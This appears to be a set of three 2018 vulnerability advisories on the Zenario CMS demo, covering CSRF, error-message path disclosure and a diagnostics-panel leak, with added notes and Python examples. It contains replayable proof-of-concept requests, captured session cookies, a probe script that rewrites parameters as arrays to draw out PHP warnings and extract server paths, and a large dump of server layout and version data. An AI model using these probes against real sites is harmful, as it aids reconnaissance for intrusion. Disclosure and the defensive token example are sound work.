---------------------------
# Exploit Title: Zenar Content Management System - Cross-Site Request Forgery ( CSRF )
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-21
# Category: Web Application

# POC :

# GET Request :

Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade

Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest

# Query String Parameters :

path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0

Note: the query string carries no anti-CSRF token; the only credential on the request is the admin session cookie PHPSESSID, which the browser attaches to any request it makes, including one triggered from a page on another site. Two things limit the impact as captured: this particular request only lists the Organizer content panel, and the X-Requested-With: XMLHttpRequest header cannot be added by a cross-site form or image (a cross-origin XMLHttpRequest that adds it is stopped by the CORS preflight), so a forged request is accepted only if the server does not insist on that header.

# CSRF HTML :
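Independently of the HTML proof of concept, the following is an added example, not part of the advisory and not Zenario code, of the server-side check that an AJAX endpoint such as organizer.ajax.php needs to defeat this class of forgery: a synchronizer token that is an HMAC over the session id and an expiry time. The browser will send the PHPSESSID cookie to any origin's request, but only the server can compute the token. The handler, the "_csrf" parameter name and the server secret are assumptions for illustration; the cookie value is the one from the captured request.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Server-side secret for minting tokens. Assumption: generated at start-up
# here; a deployment would load it from configuration so tokens survive restarts.
SERVER_SECRET = secrets.token_bytes(32)


def _mac(session_id: str, expiry: int) -> str:
    return hmac.new(SERVER_SECRET, f"{session_id}:{expiry}".encode(), hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str, ttl: int = 3600, now: Optional[int] = None) -> str:
    """Mint a token bound to one session: "<expiry>:<hmac-sha256>".

    Only the server knows SERVER_SECRET, so a page on another origin can make
    the browser send the PHPSESSID cookie but cannot compute a matching token.
    """
    expiry = (int(time.time()) if now is None else now) + ttl
    return f"{expiry}:{_mac(session_id, expiry)}"


def verify_csrf_token(token: Optional[str], session_id: str, now: Optional[int] = None) -> bool:
    """Accept only an unexpired token whose MAC was minted for this session."""
    if not token or ":" not in token:
        return False
    expiry_str, mac = token.split(":", 1)
    if not expiry_str.isdigit():
        return False
    expiry = int(expiry_str)
    if (int(time.time()) if now is None else now) > expiry:
        return False
    # Constant-time comparison: a byte-by-byte early exit would leak the MAC.
    return hmac.compare_digest(mac, _mac(session_id, expiry))


def handle_organizer_ajax(params: dict, cookies: dict, headers: dict, now: Optional[int] = None):
    """Hypothetical handler standing in for organizer.ajax.php.

    Returns (status, body). The PHPSESSID cookie is the session credential
    exactly as in the captured request; the "_csrf" parameter name is an
    assumption, not a Zenario parameter.
    """
    session_id = cookies.get("PHPSESSID")
    if not session_id:
        return 401, "no admin session"
    # Defence in depth: a cross-site <form> or <img> cannot add this header,
    # and a cross-origin XMLHttpRequest that adds it fails the CORS preflight.
    if headers.get("X-Requested-With") != "XMLHttpRequest":
        return 403, "missing X-Requested-With"
    if not verify_csrf_token(params.get("_csrf"), session_id, now):
        return 403, "bad or missing CSRF token"
    return 200, f"panel {params.get('path')} for session {session_id}"


def demo():
    """Legitimate Organizer request versus a forged one from another origin."""
    cookies = {"PHPSESSID": "1jltufrek0ugagehl7fjieeud6"}  # cookie value from the captured request
    path = "zenario__content/panels/content"
    token = issue_csrf_token(cookies["PHPSESSID"])
    legit = handle_organizer_ajax({"path": path, "_csrf": token}, cookies,
                                  {"X-Requested-With": "XMLHttpRequest"})
    # The forgery carries the same cookie (the browser adds it) but neither
    # the header nor a token the attacker could have computed.
    forged = handle_organizer_ajax({"path": path}, cookies, {})
    return legit[0], forged[0]


if __name__ == "__main__":
    print(demo())  # (200, 403)
```

The token is tied to the session rather than stored per request, so it needs no server-side table; rotating SERVER_SECRET invalidates every outstanding token at once, which is the behaviour you want after an incident.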

---------------------------
# Exploit Title: Zenar Content Management System - Disclosure Sensitive Data
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-22
# Category: Web Application

# POC :

Description : This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.

Parameters : /zenario/admin/welcome.ajax.php

Example : http://localhost/zenario/admin/welcome.ajax.php

Attack details : URL-encoded POST input _box was set to

%7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before%22%3Atrue%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value%22%3A%22e%22%7D%2C%22password%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22login%22%3A%7B%22pressed%22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous%22%3A%7B%22pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22description%22%3A%7B%7D%2C%22email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous%22%3A%7B%7D%2C%22reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D

which decodes to the login form state that the admin welcome page normally submits:

{"tab":"login","tabs":{"login":{"edit_mode":{"on":"1"},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"e"},"password":{"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":false},"forgot":{"pressed":true},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":"1"},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}

The value itself is harmless; what triggers the error is the parameter name. In the request below it is sent as _box[] rather than _box, so PHP delivers it in $_POST as a one-element array, and json_decode() refuses anything but a string.

Error message found :

Warning: json_decode() expects parameter 1 to be string, array given in /var/www/zenario-source/Zenario-8.1/zenario/admin/welcome.ajax.php on line 82

The warning reveals the absolute path of the installation (the directory name Zenario-8.1 also suggests the installed version) and the line of the script that decodes the parameter.
Request :

POST /zenario/admin/welcome.ajax.php?get=[]&task= HTTP/1.1
Content-Length: 782
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.zenar.io:80/zenario/admin/organizer.php?fromCID=1&fromCType=html
Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4
Host: demo.zenar.io
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*

_box[]=%7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before%22%3Atrue%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value%22%3A%22e%22%7D%2C%22password%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22login%22%3A%7B%22pressed%22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous%22%3A%7B%22pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22description%22%3A%7B%7D%2C%22email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous%22%3A%7B%7D%2C%22reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D&_validate=true

Response :

HTTP/1.1 200 OK
Date: Mon, 21 May 2018 20:52:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2568
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Original-Content-Encoding: gzip

The impact of this vulnerability : The error messages may disclose sensitive information. This information can be used to launch further attacks.

How to fix this vulnerability : Review the source code for this script. In practice that means two things: the script should check that $_POST['_box'] is a string (is_string()) before passing it to json_decode() and reject anything else, and the production php.ini should have display_errors off and log_errors on, so that a warning from any script goes to the server log instead of into the HTTP response.
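The mechanism behind this finding is how PHP parses form input: a parameter named _box[] arrives in $_POST as an array, json_decode() warns, and with display_errors on the warning, absolute script path included, lands in the response. The following is an added example, not part of the advisory and not Zenario code. It rewrites a captured form body so that each scalar parameter is resubmitted as an array (the general form of the probe the scanner used on _box), and parses a response body for PHP error lines to pull out the leaked path and line number. The request body and the two response bodies are constructed here from the values quoted above; the helper names are this example's own.

```python
import re
from urllib.parse import parse_qsl, urlencode

# The POST body the advisory shows, rebuilt from the decoded _box JSON.
# Constructed here; the field values are the ones in the captured request.
ORIGINAL_BODY = urlencode({
    "_box": '{"tab":"login","tabs":{"login":{"fields":{"username":{"current_value":"e"},'
            '"password":{"current_value":""}}}},"path":"login"}',
    "_validate": "true",
})

# Constructed response bodies carrying the exact warning quoted in the advisory:
# once as PHP prints it with html_errors=On, once as plain text.
RESPONSE_HTML_ERRORS = (
    "<br />\n<b>Warning</b>:  json_decode() expects parameter 1 to be string, array given in "
    "<b>/var/www/zenario-source/Zenario-8.1/zenario/admin/welcome.ajax.php</b> on line <b>82</b><br />\n"
    '{"tab":"login"}'
)
RESPONSE_PLAIN_ERRORS = (
    "\nWarning: json_decode() expects parameter 1 to be string, array given in "
    "/var/www/zenario-source/Zenario-8.1/zenario/admin/welcome.ajax.php on line 82\n"
    '{"tab":"login"}'
)

PHP_ERROR_RE = re.compile(
    r"(?:<b>)?(?P<level>Warning|Notice|Deprecated|Fatal error|Parse error)(?:</b>)?:\s*"
    r"(?P<message>[^\n]+?) in (?:<b>)?(?P<file>/[^<\s]+)(?:</b>)? on line (?:<b>)?(?P<line>\d+)(?:</b>)?"
)


def array_mutations(body: str):
    """Yield (parameter, mutated_body): each scalar parameter in turn is renamed
    to "name[]", which PHP parses into $_POST['name'] as an array. Code that
    assumes a string (json_decode(), strlen(), preg_match(), ...) then warns."""
    pairs = parse_qsl(body, keep_blank_values=True)
    for i, (name, value) in enumerate(pairs):
        if name.endswith("[]"):
            continue
        mutated = pairs[:i] + [(name + "[]", value)] + pairs[i + 1:]
        yield name, urlencode(mutated)


def extract_php_errors(response_text: str):
    """Return every PHP error line in a response as a dict carrying the leaked
    absolute script path and line number."""
    return [
        {"level": m["level"], "message": m["message"], "file": m["file"], "line": int(m["line"])}
        for m in PHP_ERROR_RE.finditer(response_text)
    ]


def leaked_install_root(errors, marker="/zenario/"):
    """Cut each leaked path at the first marker directory to recover the
    install root, e.g. /var/www/zenario-source/Zenario-8.1."""
    roots = set()
    for e in errors:
        idx = e["file"].find(marker)
        if idx > 0:
            roots.add(e["file"][:idx])
    return sorted(roots)


if __name__ == "__main__":
    for name, body in array_mutations(ORIGINAL_BODY):
        print(f"mutate {name}: {body[:60]}...")
    for e in extract_php_errors(RESPONSE_HTML_ERRORS):
        print(e)
    print(leaked_install_root(extract_php_errors(RESPONSE_PLAIN_ERRORS)))
```

The same mutation applies to the query string (the captured request also carries get=[]); a response that differs only by a PHP warning is the signal, and the file path in it is what turns a cosmetic finding into a map of the target.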
---------------------------
# Exploit Title: Zenar Content Management System - Disclosure Username/Password Sensitive Data
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-22
# Category: Web Application

# POC :

Description : A username and/or password was found in this file. This information could be sensitive.

Example : http://localhost/zenario/admin/welcome.ajax.php

Note: the data below contain no credential. The response is the Organizer diagnostics panel (path "diagnostics") served by welcome.ajax.php, and what it discloses is the server's absolute filesystem layout (backup_dir, docstore_dir, template_dir, skin_dir_1, cache_dir, private_dir and public_dir, all under /var/www/clients/zenario_demo/), the exact Apache, PHP and MySQL versions, the titles of unpublished draft pages, and the panel's own warnings that the site runs in development mode, serves its extranet login without HTTPS and has no two-factor authentication on the admin login.

# DATA :

{"key":{"first_viewing":false},"tab":"0","tabs":[{"edit_mode":{"enabled":"1","on":"1","always_on":"1"},"show_errors_after_field":"description","fields":{"description":{"full_width":"1","snippet":{"html":"

Diagnostics<\/h1>"},"ord":1},"sub_table":{"type":"grouping","name":"sub_table","ord":2,"value":""},"system_requirements":{"grouping":"sub_table","full_width":"1","snippet":{"html":"System Requirements"},"visible_if":"zenarioAW.togglePressed(1)","ord":3,"row_class":"section_valid"},"show_system_requirements":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":4},"server":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Web Server"},"visible_if":"zenarioAW.togglePressed(2)","ord":5},"show_server":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":6},"server_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"Apache http server version 2.4.7 or later"},"visible_if":"zenarioAW.togglePressed()","ord":7,"post_field_html":" (you have version Server version: Apache\/2.4.18 (Ubuntu) Server built: 2017-09-18T15:09:02<\/em>)"},"php":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"PHP"},"visible_if":"zenarioAW.togglePressed(2)","ord":8},"show_php":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":9},"php_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"PHP version 7.0 or later"},"visible_if":"zenarioAW.togglePressed()","ord":10,"post_field_html":" (you have version 7.0.28-0ubuntu0.16.04.1<\/em>)"},"opcache_misconfigured":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"In your php.ini<\/code> you have opcache.enable<\/code>\nturned on, and you have opcache.dups_fix<\/code> turned off.\n\nThis may cause occasional PHP “fatal errors” on your site.\n\nPlease edit your php.ini<\/code> and either turn opcache.enable<\/code> off\nor else 
turn opcache.dups_fix<\/code> on."},"visible_if":"zenarioAW.togglePressed()","ord":11,"hidden":true},"mysql":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"MySQL"},"visible_if":"zenarioAW.togglePressed(2)","ord":12},"show_mysql":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":13},"mysql_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"MySQLi extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":14},"mysql_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"MySQL client and MySQL server version 5.5.3 or later"},"visible_if":"zenarioAW.togglePressed()","ord":15,"post_field_html":" (your client is version mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine wrapper<\/em>)"},"mb":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Unicode Support"},"visible_if":"zenarioAW.togglePressed(2)","ord":16},"show_mb":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":17},"mb_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"ctype extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":18},"mb_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"mbstring extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":19},"gd":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Image Manipulation"},"visible_if":"zenarioAW.togglePressed(2)","ord":20},"show_gd":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, 
tuixObject)","ord":21},"gd_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"GD Library enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":22},"gd_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"GIF Read Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":23},"gd_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"JPG Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":24},"gd_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"PNG Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":25},"optional":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Optional requirements"},"visible_if":"zenarioAW.togglePressed(2)","ord":26},"show_optional":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":27},"optional_mod_deflate":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"deflate module enabled in Apache\nNeeded for compressing files, for a faster page-load<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":28},"optional_mod_expires":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"expires module enabled in Apache\nNeeded for images and files to be cached in the visitors browser, for a faster page-load<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":29},"optional_mod_rewrite":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"rewrite module enabled in Apache\nNeeded for friendly URLs<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":30},"optional_curl":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"curl extension enabled in PHP\nNeeded for translating pages using Google 
Translate<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":31},"optional_zip":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"zip extension enabled in PHP\nNeeded for creating document extracts<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":32},"dirs":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Directories"},"visible_if":"zenarioAW.togglePressed(1)","ord":33,"row_class":"section_valid"},"show_dirs":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":34},"dir_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Backup Storage Area"},"visible_if":"zenarioAW.togglePressed(2)","ord":35},"show_dir_1":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":36},"dir_1_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"If you wish to store site backups on your server, you should create a directory\non your server in which to keep them.\nIt should start with a slash, but do not add a trailing slash."},"visible_if":"zenarioAW.togglePressed()","ord":37},"backup_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","visible_if":"zenarioAW.togglePressed()","ord":38,"value":"\/var\/www\/clients\/zenario_demo\/backup","readonly":true},"backup_dir_status":{"grouping":"sub_table","full_width":"1","snippet":{"html":"The directory backup<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":39,"row_class":"sub_valid"},"dir_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Document Secure Store 
(Docstore)"},"visible_if":"zenarioAW.togglePressed(2)","ord":40},"show_dir_2":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":41},"dir_2_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"You should create a directory on your server where Documents can be stored by the CMS.\nPlease enter the absolute path to the directory.\nIt should start with a slash, but do not add a trailing slash."},"visible_if":"zenarioAW.togglePressed()","ord":42},"docstore_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","visible_if":"zenarioAW.togglePressed()","ord":43,"value":"\/var\/www\/clients\/zenario_demo\/docstore_staging","readonly":true},"docstore_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory docstore_staging<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":44},"dir_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Templates Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":45},"show_dir_3":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":46},"dir_3_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses template files to form the layout of web pages.\nThese may be edited by an administrator, and Zenario writes them to the following directory.\nPlease ensure it exists and is writable by the web 
server:"},"visible_if":"zenarioAW.togglePressed()","ord":47},"template_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":48,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/zenario_custom\/templates\/grid_templates"},"template_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory grid_templates<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":49},"dir_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"CSS Directories"},"visible_if":"zenarioAW.togglePressed(2)","ord":50,"hidden":false},"show_dir_4":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":51,"hidden":false},"dir_4_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"CSS for plugins may be edited by an administrator, and Zenario writes CSS files to the following directory. 
Please ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":52,"hidden":false},"skin_dir_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":53,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/zenario_custom\/templates\/grid_templates\/skins\/deep_dive\/editable_css\/","current_value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/zenario_custom\/templates\/grid_templates\/skins\/deep_dive\/editable_css\/","hidden":false},"skin_dir_status_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory editable_css<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":54,"hidden":false},"skin_dir_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":55,"value":"","hidden":true},"skin_dir_status_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":56,"hidden":true},"skin_dir_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":57,"value":"","hidden":true},"skin_dir_status_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":58,"hidden":true},"skin_dir_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":59,"value":"","hidden":true},"skin_dir_status_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" 
"},"visible_if":"zenarioAW.togglePressed()","ord":60,"hidden":true},"skin_dir_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":61,"value":"","hidden":true},"skin_dir_status_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":62,"hidden":true},"skin_dir_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":63,"value":"","hidden":true},"skin_dir_status_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":64,"hidden":true},"skin_dir_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":65,"value":"","hidden":true},"skin_dir_status_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":66,"hidden":true},"skin_dir_8":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":67,"value":"","hidden":true},"skin_dir_status_8":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":68,"hidden":true},"skin_dir_9":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":69,"value":"","hidden":true},"skin_dir_status_9":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":70,"hidden":true},"dir_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Cache 
Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":71},"show_dir_5":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":72},"dir_5_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario can store generated files in a cache directory to speed up performance and reduce load on the database.\nPlease ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":73},"cache_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":74,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/cache"},"cache_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "cache" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":75},"dir_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Private Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":76},"show_dir_6":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":77},"dir_6_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses a cache directory to store documents and images temporarily\nwhile they are downloaded by users.\nPlease ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":78},"private_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":79,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/private"},"private_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "private" directory exists and 
is writable."},"visible_if":"zenarioAW.togglePressed()","ord":80},"dir_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Public Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":81},"show_dir_7":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":82},"dir_7_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses a directory to store documents that are publicly available.\nThis directory MUST be writable by the web server."},"visible_if":"zenarioAW.togglePressed()","ord":83},"public_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":84,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/public"},"public_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "public" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":85},"site":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Site 